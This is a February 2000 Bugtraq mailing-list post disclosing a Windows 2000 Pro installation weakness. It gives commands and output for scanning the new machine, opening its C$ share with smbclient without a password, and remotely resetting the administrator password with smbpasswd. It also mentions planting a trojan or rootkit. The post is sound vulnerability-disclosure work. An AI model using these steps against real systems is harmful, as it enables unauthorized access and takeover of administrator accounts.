From: Stephane Aubert [Stephane.Aubert@HSC.FR] Sent: Wednesday, February 23, 2000 8:58 AM To: BUGTRAQ@SECURITYFOCUS.COM Subject: Re: Windows 2000 installation process weakness Hello, As a lot of people asked me information on the unsecure win2k pro installation process, we wish to bring further information on this vulnerability. All these tests have been made and checked with Denis Ducamp and Alain Thivillon, 2 serious security experts. What we have done : 1. Install the final release of win2k pro (build 2195) 2. Do not give any IP address during the install. If no DHCP server is responding the win2k pro box take 169.254.153.13 as IP address. (The address range used is 169.254.0.0/16, which is registered with the IANA as the LINKLOCAL net.) Notice : if a real IP address is given by the admin or a DCHP server you can connect directely, and jump to step 4 right now. 3. On your favorit Linux (or *BSD) box add an alias to the interface : # ifconfig eth0:0 169.254.153.11 4. Just after the configuration of COM+ by win2k you can ping or scan it : % nmap 169.254.153.13 Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on (169.254.153.13): Port State Protocol Service 139 open tcp netbios-ssn # nmap -sU -p 1-200 169.254.153.13 Starting nmap V. 2.3BETA10 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/) Interesting ports on (169.254.153.13): Port State Protocol Service 137 open udp netbios-ns 138 open udp netbios-dgm Notice : the administrtor have already entered a password !!! 5. By now, you can connect via SMB (smbclient for example) to the C$ or ADMIN$ share WITHOUT ANY PASSWORD !!! This until win2k asked the admin to reboot the computer. Notice : it's possible to use NAT (netbios auditing tool) to obtain the netbios name of the windows box and the shares. % ./smbclient //groar/c$ -I 169.254.153.13 -U administrator added interface ip=169.254.153.12 bcast=169.254.153.31 nmask=255.255.255.224 Password: Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager] smb: \> ls IO.SYS HSR 40992 Tue May 31 06:22:00 1994 MSDOS.SYS HSR 38166 Tue May 31 06:22:00 1994 COMMAND.COM R 56286 Tue May 31 06:22:00 1994 WINA20.386 A 9349 Tue May 31 06:22:00 1994 CONFIG.SYS A 638 Fri Feb 18 15:34:00 2000 AUTOEXEC.BAT A 690 Fri Feb 18 15:33:10 2000 6. Worse ! You can SET (remotly) a new administrator password : % ./smbpasswd -U administrator -r groar Old SMB password: New SMB password: Retype new SMB password: startsmbfilepwent: unable to open file /usr/local/samba/private/smbpasswd unable to open smb password database. Password changed for user administrator. By now, nobody - even the administrator - even after the reboot - can connect (remote nor local) without the NEW password. The administrator have to crack his own computer ;-)) 7. Worse ! It is also (evidence) possible to transfert a trojan on the new computer or just a rootkit (www.rootkit.com) in order to keep administrator privileges for a long time :( Regards, Stéphane -- Stephane AUBERT -=- Herve Schauer Consultants Stephane.Aubert@hsc.fr http://www.hsc.fr/